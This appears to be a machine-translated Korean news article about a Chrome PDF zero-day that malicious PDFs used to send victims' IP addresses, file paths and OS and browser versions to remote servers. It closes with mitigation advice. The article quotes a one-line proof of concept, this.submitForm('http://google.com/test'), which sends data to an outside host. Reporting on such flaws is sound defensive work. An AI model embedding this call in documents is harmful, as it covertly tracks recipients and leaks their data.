악용 탐지 서비스 EdgeSpot은 PDF 문서를 악용하는 흥미로운 Chrome 제로 데이 취약점을 발견했습니다. 이 취약성을 통해 공격자는 Chrome에서 열린 악성 PDF 문서를 사용하여 민감한 데이터를 수집 할 수 있습니다.

피해자가 Chrome에서 해당 PDF 파일을 열 자마자 사용자 데이터를 수집하여 악성 프로그램이 백그라운드에서 작동하기 시작합니다.

그런 다음 해커가 제어하는 ​​원격 서버로 데이터가 전달됩니다. 공격자가 어떤 데이터를 빨아들이는지 궁금해 할 수 있으며 PC에서 다음 데이터를 대상으로합니다.

• IP 주소
• 시스템에서 PDF 파일의 전체 경로
• OS 및 Chrome 버전

맬웨어에 의해 작성된 PDF 파일에주의

PDF 파일을 여는 데 Adobe Reader가 사용될 때 아무 일도 일어나지 않는다는 사실에 놀랄 수도 있습니다. 또한 HTTP POST 요청은 사용자 개입없이 데이터를 원격 서버로 전송하는 데 사용됩니다.

전문가들은 두 도메인 중 하나가 readnotifycom 또는 burpcollaboratornet이 데이터를 수신하고 있음을 발견했습니다.

대부분의 바이러스 백신 소프트웨어가 EdgeSpot에 의해 탐지 된 샘플을 탐지 할 수 없다는 사실을 고려하여 공격 강도를 상상할 수 있습니다.

전문가들은 공격자가“this.submitForm ()”PDF Javascript API를 사용하여 사용자의 민감한 정보를 수집하고 있음을 밝힙니다.

Google은 최소한의 PoC로 테스트했으며 'this.submitForm ('http://google.com/test ')'과 같은 간단한 API 호출로 Chrome에서 개인 데이터를 google.com으로 보냅니다.

전문가들은 실제로이 Chrome 버그가 두 개의 서로 다른 악성 PDF 파일 세트에 의해 악용되고 있음을 알게되었습니다. 둘 다 2017 년 10 월과 2018 년 9 월에 배포되었습니다.

특히, 공격자는 수집 된 데이터를 사용하여 향후 공격을 미세 조정할 수 있습니다. 보고서는 첫 번째 파일 배치가 ReadNotify의 PDF 추적 서비스를 사용하여 컴파일되었다고 제안합니다.

사용자는 서비스를 사용하여 사용자보기를 추적 할 수 있습니다. EdgeSpot은 두 번째 PDF 파일 세트의 특성에 대한 세부 사항을 공유하지 않았습니다.

보호받는 방법

취약성 공격 탐지 서비스 EdgeSpot은 가까운 시일 내에 패치가 출시 될 것으로 예상되지 않기 때문에 Chrome 사용자에게 잠재적 위험에 대해 경고하기를 원했습니다.

EdgeSpot은 작년에이 취약점에 대해 Google에보고했으며 회사는 4 월 말에 패치를 릴리스하기로 약속했습니다. H

그러나 대체 PDF 판독기 앱을 사용하여 수신 된 PDF 문서를 로컬에서 확인하여 문제에 대한 임시 해결 방법 사용을 고려할 수 있습니다.

또는 인터넷에서 시스템을 분리하여 Chrome에서 PDF 문서를 열 수도 있습니다. 한편 4 월 23 일에 출시 될 Chrome 74 업데이트를 기다릴 수 있습니다.